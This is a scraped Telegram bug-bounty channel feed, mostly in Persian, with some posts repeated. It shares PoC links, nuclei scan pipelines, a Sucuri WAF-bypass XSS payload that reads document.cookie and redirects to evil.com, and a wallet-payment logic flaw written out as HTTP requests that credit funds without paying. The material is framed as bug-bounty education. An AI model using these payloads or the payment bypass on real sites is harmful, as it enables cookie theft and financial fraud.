یک چنل با محتوای بدرد بخور:
https://news.1rj.ru/str/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
https://news.1rj.ru/str/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
Telegram
Bugbounty Tips
research and sharing in cybersecurity
👍15🔥1
https://github.com/coffinxp/nuclei-templates
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
GitHub
GitHub - coffinxp/nuclei-templates
Contribute to coffinxp/nuclei-templates development by creating an account on GitHub.
👍5👎1🔥1
دوستان کار نشد نداره حتی کمپانی که بزرگه تیم امنیت داره و... هم میتونه آسیب پذیری های خطرناکی داشته باشه چه بسا تیم داخلی بصورت وایت باکس و بلک باکس تست کنه و همچنین پنتست سالینه خارج از سازمان بشه،اسکیلاتونو لول آپ کنین
عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..
عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..
❤11👍3
Sucuri WAF Bypass:
payload:
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
payload:
<a aa aaa aaaa aaaaaa href=javanoscript:alert(document.cookie)>ClickMe
<a href="javanoscript:alert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window.location.href='https://evil.com';">ClickMe</a>
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
👍3👀2
Email-verification-bypass.mkv
56.6 MB
سلام دوستان برای Email Verification bypass یک ویدیو براتون آماده کردم که روی برنامه پابلیک هکروان بود
(https://hackerone.com/opensea?type=team)
با توضیحات آسیب پذیری که تجربه یک سناریو ساده و کاربردی رو بهتون انتقال میده، امیدوارم براتون مفید باشه
تایتل آسیب پذیری:
Email Verification Bypass
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Video
#Writeup
(https://hackerone.com/opensea?type=team)
با توضیحات آسیب پذیری که تجربه یک سناریو ساده و کاربردی رو بهتون انتقال میده، امیدوارم براتون مفید باشه
تایتل آسیب پذیری:
Email Verification Bypass
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Video
#Writeup
👍20❤8🤝2🔥1👏1
Logger++ Custom Filters
A comprehensive list of custom filters for Logger++ to identify various #vulnerabilities in different #API styles
https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#bugbounty
A comprehensive list of custom filters for Logger++ to identify various #vulnerabilities in different #API styles
https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#bugbounty
GitHub
GitHub - bnematzadeh/LoggerPlusPlus-API-Filters: A comprehensive list of custom filters for Logger++ to identify various vulnerabilities…
A comprehensive list of custom filters for Logger++ to identify various vulnerabilities in different API styles - bnematzadeh/LoggerPlusPlus-API-Filters
👍9
Media is too big
VIEW IN TELEGRAM
🐞 Party🥳🥳
به همه عوامل برگذارکنندگان این رویداد خسته نباشید میگم تا اینجا خیلی خوش گذشته✌️
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
به همه عوامل برگذارکنندگان این رویداد خسته نباشید میگم تا اینجا خیلی خوش گذشته✌️
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
❤15👎4
CyberPanel-RCE
https://github.com/DreyAnd/CyberPanel-RCE
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#exploit
#Bugbounty
https://github.com/DreyAnd/CyberPanel-RCE
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#exploit
#Bugbounty
🔥5
شارژ کیف پول بدون پرداخت!
آسیب پذیری منطقی که در درخواست شارژ کیف پول وجود داشت..
ساده، جالب و بدرد بخور
فلو شارژ اینجوری بود که یک درخواست به سامانه میرفت با پارامتر method یک درگاه رو انتخاب میکرد به همراه رقم، در پاسخ لینک پرداخت رو به کاربر میداد ریدایرکت میشد و در صورت موفق بودن میرفت برای callback به این شکل:
آسیب پذیری منطقی که در درخواست شارژ کیف پول وجود داشت..
ساده، جالب و بدرد بخور
فلو شارژ اینجوری بود که یک درخواست به سامانه میرفت با پارامتر method یک درگاه رو انتخاب میکرد به همراه رقم، در پاسخ لینک پرداخت رو به کاربر میداد ریدایرکت میشد و در صورت موفق بودن میرفت برای callback به این شکل:
POST /api/wallet-payment HTTP/2
Host: (:
{"method":"zarinpal","amount":"200000"}
🔥6👍1
Bugbounty Tips
شارژ کیف پول بدون پرداخت! آسیب پذیری منطقی که در درخواست شارژ کیف پول وجود داشت.. ساده، جالب و بدرد بخور فلو شارژ اینجوری بود که یک درخواست به سامانه میرفت با پارامتر method یک درگاه رو انتخاب میکرد به همراه رقم، در پاسخ لینک پرداخت رو به کاربر میداد ریدایرکت…
با خودم گفتم متد وقتی متد درگاه وجود داره ممکنه از متد wallet هم بابت پرداخت هزینه های سرویس سایت از ولت کاربر هم استفاده بشه
تیر تو تاریکی..
متد رو کردم ولت به این شکل:
در کمال تعجب ولت من شارژ شد!
جالب بود برام گفتم برای شما هم به اشتراک بزارم.
امیدوارم براتون مفید باشه❤️
تیر تو تاریکی..
متد رو کردم ولت به این شکل:
POST /api/wallet-payment HTTP/2
Host: (:
{"method":"wallet","amount":"20000000"}
در کمال تعجب ولت من شارژ شد!
جالب بود برام گفتم برای شما هم به اشتراک بزارم.
امیدوارم براتون مفید باشه❤️
👏24❤3
Bugbounty Tips
یکم تا سوم ایونت باگ پارتی راورو اگه بودید میبینمتون❤️
پیمان روز آخر اومد دوتا ایجکشن زد و رفت 😂😂😂🤑
نوش جونش
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
نوش جونش
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
👏7
Forwarded from PentesterLand Academy - Public
این رو به هیچ وجه از دست ندید:
https://www.instagram.com/reel/DB4IlpHCnxW/?igsh=MXRmOHR0c3lldDBvcA==
آسیب پذیری Race Condition! برای تمام فصول، پارت دوم!
در این پارت به سناریو عملی این آسیب پذیری پرداختیم، نکاتش رو گفتیم و یکی از معروف ترین و بزرگ ترین لابراتوارهای اون رو حل کردیم، و سعی شد کامل این آسیب پذیری به زبان ساده پوشش داده بشه!
کامل این ویدئو رو در چنل یوتیوب PentesterLand قرارداده شد:
https://youtu.be/55ioAXYbli0
https://www.instagram.com/reel/DB4IlpHCnxW/?igsh=MXRmOHR0c3lldDBvcA==
آسیب پذیری Race Condition! برای تمام فصول، پارت دوم!
در این پارت به سناریو عملی این آسیب پذیری پرداختیم، نکاتش رو گفتیم و یکی از معروف ترین و بزرگ ترین لابراتوارهای اون رو حل کردیم، و سعی شد کامل این آسیب پذیری به زبان ساده پوشش داده بشه!
کامل این ویدئو رو در چنل یوتیوب PentesterLand قرارداده شد:
https://youtu.be/55ioAXYbli0
👍6